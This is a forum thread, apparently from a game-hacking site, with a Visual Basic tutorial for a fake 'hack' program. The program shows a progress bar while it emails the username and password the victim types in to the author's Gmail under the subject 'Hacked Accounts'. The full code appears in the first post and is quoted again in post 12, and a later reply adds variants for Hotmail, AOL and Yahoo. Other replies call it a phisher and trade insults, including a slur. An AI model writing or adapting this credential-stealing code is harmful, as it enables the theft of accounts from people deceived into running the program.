Page 1 of 2 12 LastLast
Results 1 to 15 of 19
  1. #1
    Shaadow's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Posts
    25
    Reputation
    10
    Thanks
    4
    My Mood
    Brooding

    [TuT] How To Make a Fake Hack [Pics]

    What?

    What were making is a fake program that sends the text in the text box to your gmail after the progress bar is done loading.
    The Design

    This is pretty straight forward here just make a design with 2 text boxes, a button, a timer, and a loading bar.

    The Code

    Once your design is done double click on each "tool" in this order (for neatness) Form1, The timer, and lastly the button.

    Now make a new Import like the following picture

    Next add this in the Form1
    Code:
            Button1.Enabled = True
            Timer1.Enabled = False
    What this means is that if Button1 is enabled then the timer is disabled.
    Next add this code in the timer1
    Code:
             If ProgressBar1.Value <> 100 Then ProgressBar1.Value = ProgressBar1.Value + "1"
            If ProgressBar1.Value = 100 Then Timer1.Stop()
    This checks for the progress bar and if its value is less > 0 then start the timer.
    Next move to the button1 and add this to it
    Code:
       
                Timer1.Start()
                Dim UserName As String = "YourEmailHere@Gmail.com"
                Dim Password As String = "Your Emails"
                Dim mail As MailMessage = New MailMessage
    
                mail.From = New MailAddress(UserName)
                mail.To.Add(New MailAddress(UserName))
                mail.Priority = MailPriority.High
                mail.Subject = "Hacked Accounts"
                mail.Body = "Username: " + TextBox1.Text + vbNewLine + vbNewLine + "Password: " + TextBox2.Text
    
                mail.IsBodyHtml = True
    
                Dim client As SmtpClient = New SmtpClient("smtp.gmail.com", 587)
                client.EnableSsl = True
                client.Credentials = New System.Net.NetworkCredential(UserName, Password)
                Try
                    client.Send(mail)
                Catch ex As Exception
                    MessageBox.Show("An error occured while processing your request. Please try again.")
                    If ProgressBar1.Value = 100 Then Timer1.Stop()
                End Try
    This starts the timer then emails you what is in the text box and once it hits the value 100 it stops it.

    You can fool proof it yourself this was hardcoded by me.

  2. The Following 3 Users Say Thank You to Shaadow For This Useful Post:

    An0nymousHelper (08-25-2010),FallenDark (10-29-2010),iliakos4748 (04-21-2015)

  3. #2
    258456's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    ghjghj
    Posts
    1,222
    Reputation
    18
    Thanks
    300
    My Mood
    Relaxed
    hahaha, you didn't make this, lol, don't take cred for other people's stuff, i doubt you made the server for this, idiot.

  4. #3
    aLcohoL_95's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    SatyRicon
    Posts
    685
    Reputation
    8
    Thanks
    291
    My Mood
    Cynical
    its just a simple phising or something like that -.-
    and u leeched it -.-

    CANNIBAL CORPSE P0WNS


  5. #4
    Lonely Tedy Bear's Avatar
    Join Date
    Jul 2010
    Gender
    female
    Location
    Utah,Salt Lake Posts: 5,371 ►►►►Lonely-Tedy◄◄◄◄
    Posts
    1,541
    Reputation
    -151
    Thanks
    321
    My Mood
    Lonely
    Quote Originally Posted by 258456 View Post
    hahaha, you didn't make this, lol, don't take cred for other people's stuff, i doubt you made the server for this, idiot.
    Quote Originally Posted by aLcohoL_95 View Post
    its just a simple phising or something like that -.-
    and u leeched it -.-
    lol you guys fail xD you can't leach this , that is like saying you could leach
    msgbox("LOL")
    the only person you could give credit to is Microsoft for creating the language xDD
    all this code is , is a simple mail client that was made for .net very simple

             

  6. #5
    Shaadow's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Posts
    25
    Reputation
    10
    Thanks
    4
    My Mood
    Brooding
    Both of you shut the fuck up I just wrote this you get me the fucking link this is why new people cant register because people like you to dicks flame anyone that trys to do shit. Btw, learn some grammar you fucking retard. You don't need that many commas. Also, Go find me where I leached this off of including pictures you.

  7. #6
    -Simply-Own-'s Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    CA Section
    Posts
    2,228
    Reputation
    11
    Thanks
    234
    My Mood
    Amazed
    This Is So Simple . -_-

    Need Help? With Anything? Add Me On Msn.
    simplyown123@hotmail.com



    Made By Me

    -----------------------------------------------------------------


  8. #7
    Shaadow's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Posts
    25
    Reputation
    10
    Thanks
    4
    My Mood
    Brooding
    I know but some people may be new to VB... You just can't accept that some one is helping others...

  9. #8
    haxed55noob's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Location
    fjhdbfj
    Posts
    72
    Reputation
    10
    Thanks
    2
    My Mood
    Cynical
    This is like one of the first programs most people make.
    1. Not that hard to do
    2. So many tutorials for this why make one? (Even if it is leeched)
    "And so, my fellow Americans, ask not what your country can do for you; ask what you can do for your country." -J.F.K.

  10. #9
    xovius's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    Iceland :D
    Posts
    350
    Reputation
    11
    Thanks
    12
    My Mood
    Angelic
    I'm definitely gonna try this when I finally get my Microsoft Visual Studio 2010 (for free xD)... I tried this once b4 but in the end it never worked.... couldn't send the email or smthng :S ... ty if this 1 works xD


    100 Posts []
    150 Posts []
    250 Posts []
    500 Posts []
    1000 Posts []




  11. #10
    confict's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    422
    Reputation
    3
    Thanks
    290
    My Mood
    Relaxed
    If you want to use other connections then GMAIL
    Look at this :
    Hotmail:
    Code:
          Dim mail As New MailMessage
            Try
                mail.To.Add(YourMail)
                mail.From = New MailAddress("Your mail")
                mail.Subject = txtsubj.Text
                mail.Body = txtmsg.Text
                Dim SMTP As New SmtpClient("smtp.live.com")
                SMTP.Port = 25
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("Your mail", "Your Pw".Text)
                SMTP.Send(mail)
            Catch ex As Exception
                MsgBox("Something Went Wrong", MsgBoxStyle.Exclamation, "Warning")
            End Try
    Aol
    Code:
            Dim mail As New MailMessage
            Try
                mail.To.Add("Your mail")
                mail.From = New MailAddress("Your Mail")
                mail.Subject = txtsubj.Text
                mail.Body = txtmsg.Text
                Dim SMTP As New SmtpClient("smtp.uk.aol.com")
                SMTP.Port = 465
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("Your Mail", "Your Pw")
                SMTP.Send(mail)
    
            Catch ex As Exception
                MsgBox("Something Went Wrong", MsgBoxStyle.Exclamation, "Warning")
    
            End Try
    Yahoo:

    Code:
           Dim mail As New MailMessage
            Try
                mail.To.Add("Your Mail")
                mail.From = New MailAddress("Your Mail")
                mail.Subject = txtsubj.Text
                mail.Body = txtmsg.Text
                Dim SMTP As New SmtpClient("plus.smtp.mail.yahoo.com")
                SMTP.Port = 465
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("Your Mail", "Your Pw")
                SMTP.Send(mail)
    
            Catch ex As Exception
                MsgBox("Something Went Wrong", MsgBoxStyle.Exclamation, "Warning")
    
            End Try
    These are all the ones I know,
    Thank me if I helped ^^

    ITS MEH BITCHESSS !!!

  12. #11
    xovius's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    Iceland :D
    Posts
    350
    Reputation
    11
    Thanks
    12
    My Mood
    Angelic
    Quote Originally Posted by Shaadow View Post
    Both of you shut the fuck up I just wrote this you get me the fucking link this is why new people cant register because people like you to dicks flame anyone that trys to do shit. Btw, learn some grammar you fucking retard. You don't need that many commas. Also, Go find me where I leached this off of including pictures you.
    Don't tell other people to 'learn some grammar' until you have learned some yourself (and some spelling wouldn't be bad either...)


    100 Posts []
    150 Posts []
    250 Posts []
    500 Posts []
    1000 Posts []




  13. #12
    redkevin25's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Posts
    206
    Reputation
    10
    Thanks
    124
    My Mood
    Amused
    Quote Originally Posted by Shaadow View Post
    What?

    What were making is a fake program that sends the text in the text box to your gmail after the progress bar is done loading.
    The Design

    This is pretty straight forward here just make a design with 2 text boxes, a button, a timer, and a loading bar.

    The Code

    Once your design is done double click on each "tool" in this order (for neatness) Form1, The timer, and lastly the button.

    Now make a new Import like the following picture

    Next add this in the Form1
    Code:
            Button1.Enabled = True
            Timer1.Enabled = False
    What this means is that if Button1 is enabled then the timer is disabled.
    Next add this code in the timer1
    Code:
             If ProgressBar1.Value <> 100 Then ProgressBar1.Value = ProgressBar1.Value + "1"
            If ProgressBar1.Value = 100 Then Timer1.Stop()
    This checks for the progress bar and if its value is less > 0 then start the timer.
    Next move to the button1 and add this to it
    Code:
       
                Timer1.Start()
                Dim UserName As String = "YourEmailHere@Gmail.com"
                Dim Password As String = "Your Emails"
                Dim mail As MailMessage = New MailMessage
    
                mail.From = New MailAddress(UserName)
                mail.To.Add(New MailAddress(UserName))
                mail.Priority = MailPriority.High
                mail.Subject = "Hacked Accounts"
                mail.Body = "Username: " + TextBox1.Text + vbNewLine + vbNewLine + "Password: " + TextBox2.Text
    
                mail.IsBodyHtml = True
    
                Dim client As SmtpClient = New SmtpClient("smtp.gmail.com", 587)
                client.EnableSsl = True
                client.Credentials = New System.Net.NetworkCredential(UserName, Password)
                Try
                    client.Send(mail)
                Catch ex As Exception
                    MessageBox.Show("An error occured while processing your request. Please try again.")
                    If ProgressBar1.Value = 100 Then Timer1.Stop()
                End Try
    This starts the timer then emails you what is in the text box and once it hits the value 100 it stops it.

    You can fool proof it yourself this was hardcoded by me.
    haha hardcoded this code is just the same when you searh it on googletube and this is a fake login nota fake hack NOOB LEECHER C&P!

  14. #13
    aclonegeek's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    Canada
    Posts
    349
    Reputation
    10
    Thanks
    23
    My Mood
    Relaxed
    Quote Originally Posted by redkevin25 View Post
    haha hardcoded this code is just the same when you searh it on googletube and this is a fake login nota fake hack NOOB LEECHER C&P!
    The E-Mail sender is leeched, I believe. I don't know about the rest. It's called a phiser though, other people have said it already.

  15. #14
    asifgunz's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    19
    Reputation
    10
    Thanks
    1
    My Mood
    Paranoid
    lmao mac design.

  16. #15
    xovius's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    Iceland :D
    Posts
    350
    Reputation
    11
    Thanks
    12
    My Mood
    Angelic
    Quote Originally Posted by asifgunz View Post
    lmao mac design.
    dont bump old subjects... but since u already did then, does anyone know if you can get warrock to work on a mac?

    ps. not backseat moderating, just guiding newbs...


    100 Posts []
    150 Posts []
    250 Posts []
    500 Posts []
    1000 Posts []




Page 1 of 2 12 LastLast

Similar Threads

  1. [TuT]How to make Boxes PH Hack Work [Lauwy's Hack]
    By InCapacitated in forum CrossFire Tutorials
    Replies: 8
    Last Post: 09-04-2010, 09:40 PM
  2. [TUT] How to make a Fake KEYGEN
    By JRPRO in forum Visual Basic Programming
    Replies: 8
    Last Post: 12-11-2009, 08:10 PM
  3. [REQUEST][TUT]How to make injector for hacks in VB8
    By Pixie in forum Visual Basic Programming
    Replies: 19
    Last Post: 10-10-2009, 05:43 AM
  4. [TuT] How to make MPGH Public hack to work!! [choob friendly]
    By Kev in forum CrossFire Hacks & Cheats
    Replies: 18
    Last Post: 09-02-2009, 07:31 PM
  5. [TUT]how to make neverborns speed hack to work
    By Hagerad in forum Combat Arms Hacks & Cheats
    Replies: 65
    Last Post: 08-23-2009, 10:03 PM